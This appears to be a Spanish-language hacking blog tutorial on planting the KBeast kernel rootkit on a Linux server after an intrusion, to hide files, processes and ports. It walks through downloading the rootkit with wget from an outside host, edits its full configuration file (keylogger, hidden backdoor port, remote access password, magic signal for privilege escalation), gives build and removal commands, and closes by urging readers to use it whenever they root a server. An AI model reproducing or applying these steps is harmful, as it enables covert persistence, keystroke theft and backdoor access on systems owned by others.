Banner 1

[KBEAST] Plantando un Rootkit


Siempre es conveniente asegurarse el silencio luego de una intrusion, y con que me refiero al silencio? Ademas de entrar en el tema de borrado de huellas, me refiero a la accion de dejar un secuas en el servidor que se encargue de ocultar ciertos procesos, archivos, etc que dejemos en el target para esto voy a utilizar a KBeast que es un rootkit 2011, ademas de uno de mis preferidos, tiene soporte para los kernel 2.6.18 y 2.6.32,y presenta varias funcionalidades interesantes como:

-Ocultar archivos y directorios
-Ocultar procesos de (ps, pstree, top, lsof)
- Ocultar puertos locales abiertos (backdoors)
-Viene con un modulo keylogger incorporado para capturar las pulsaciones.
-Anti-kill para procesos
-Anti-remove para archivos
-Trae un backdoor bind incorporado
- Tambien se encarga de esconder ciertos modulos cargando en el kernel ademas de un anti-remove para estos.
Bastante completita la basura!, demas esta decir que requerimos de privilegios de usuario root, en este caso lo voy a realizar en un debian con un kernel 2.6.32 (entorno controlado)
Descargamos el rootkit.
?
1
wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz

Una vez extraido nos encontramos con varios files, tendremos que editar a nuestro antojo el archivo de configuracion config.h
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
/*
Kernel Beast Ver #1.0 - Configuration File
Copyright Ph03n1X of IPSECS (c) 2011
Get more research of ours http://ipsecs.com
*/
 
/*Don't change this line*/
#define TRUE 1
#define FALSE 0
 
/*
Enable keylog probably makes the system unstable
But worth to be tried
*/
#define _KEYLOG_ TRUE
 
/*Define your module & network daemon name*/
#define KBEAST "kbeast"
 
/*
All files, dirs, process will be hidden
Protected from deletion & being killed
*/
#define _H4X0R_ "_h4x_"
 
/*
Directory where your rootkit will be saved
You have to use _H4X0R_ in your directory name
No slash (/) at the end
*/
#define _H4X_PATH_ "/usr/_h4x_"
 
/*
File to save key logged data
*/
#define _LOGFILE_ "acctlog"
 
/*
This port will be hidded from netstat
*/
#define _HIDE_PORT_ 13377
 
/*
Password for remote access
*/
#define _RPASSWORD_ "h4x3d"
#define _MAGIC_NAME_ "bin"
/*
Magic signal & pid for local escalation
*/
#define _MAGIC_SIG_ 37 //kill signal
#define _MAGIC_PID_ 31337 //kill this pid
prosigo a explicar la funcion de cada linea en el fichero de configuracion.
1- La primera linea la dejamos tal cual esta
2- la segunda se encarga de activar el modulo keylogger del rootkit en caso contrario escribimos
?
1
#define _KEYLOG_ FALSE
3- se encarga de darle el nombre al daemon rootkit
?
1
#define KBEAST "q3rv0"
4 – En esta linea vamos a incluir los ficheros y directorios que queremos que sean protegidos por el anti-remove.
?
1
#define _H4X0R_ "/home/q3rv0/protect/q3rv0.txt"
5- Define el directorio donde se guardara KBeast
?
1
#define _H4X_PATH_ "/usr/share/kbeast"
6 – Aca especificamos el nombre del fichero de log donde van a ir a parar las pulsasiones capturadas por el keylogger
?
1
#define _LOGFILE_ "acctlog"
7- El puerto que estara hide a la vista de los comandos anteriormente mencionados.
?
1
#define _HIDE_PORT_ 6666
8- Incluimos el password para el acceso con el backdoor.
?
1
2
#define _RPASSWORD_ "q3rv0"
#define _MAGIC_NAME_ "bin"
Habiendo terminado de configurar el ficherito, que bastante intuitivo es, si me saltee la 9, pero esa la dejo tal cual esta.
Procedemos a lanzar el rootkit de la siguiente manera.
En los kernel 2.6.18
?
1
./setup buil 0
En los 2.6.32 como es mi caso
?
1
./setup build
Vemos que se compilo exitosamente en el nucleo sin ningun error, ahora vamos a comprobar si cumple con nuestras espectativas.
-Verificando la proteccion anti-remove de ficheros

- Directorio donde se guarda el rootkit en el systema
- Pulsaciones capturadas por el modulo keylogger…
El fichero de log se guarda en el directorio donde le indicamos que se guarde el rootkit.

- Port 6666 Hide

- Accediendo al sistema a travez del backdoor en el puerto 6666

- oka, para remover el rootkit del kernel solo basta realizar un:

?
1
./setup clean

Espero que lo hayan disfrutado y cada vez que rooteen un server acuerdense de kbeast :)
Saludos!

-________-

Cabe anotar que blogspot es algo malo para la citación de código y reducción de imagenes dejo el link para que visiten el post bien bonito y organizado:http://underterminal.nixiweb.com/?p=393#more-393

No hay comentarios:

Powered by Bad Robot
Helped by Blackubay